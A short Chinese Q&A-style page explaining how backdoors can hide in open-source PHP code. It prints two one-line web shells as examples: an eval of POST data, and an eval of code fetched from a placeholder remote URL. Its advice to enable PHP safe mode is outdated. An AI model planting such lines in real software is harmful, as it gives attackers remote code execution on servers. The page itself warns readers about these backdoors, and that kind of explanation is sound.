
代码后门大多是一句话,
比如:
eval($_POST['backdoor']);//楼主大多注意获取数据的来源是否可靠
//注意接受表单数据函数如:$_POST[];$_GET[];
//和注意文件的读写,最可怕的是这个:
eval(file_get_contents('http://www/shellhtml'));//等等
//这个叫做远程执行,如果发现异常,请立马开启PHP的安全模式,再慢慢排查!
以上就是关于php源码开源有没有可能做后门全部的内容,包括:php源码开源有没有可能做后门、、等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)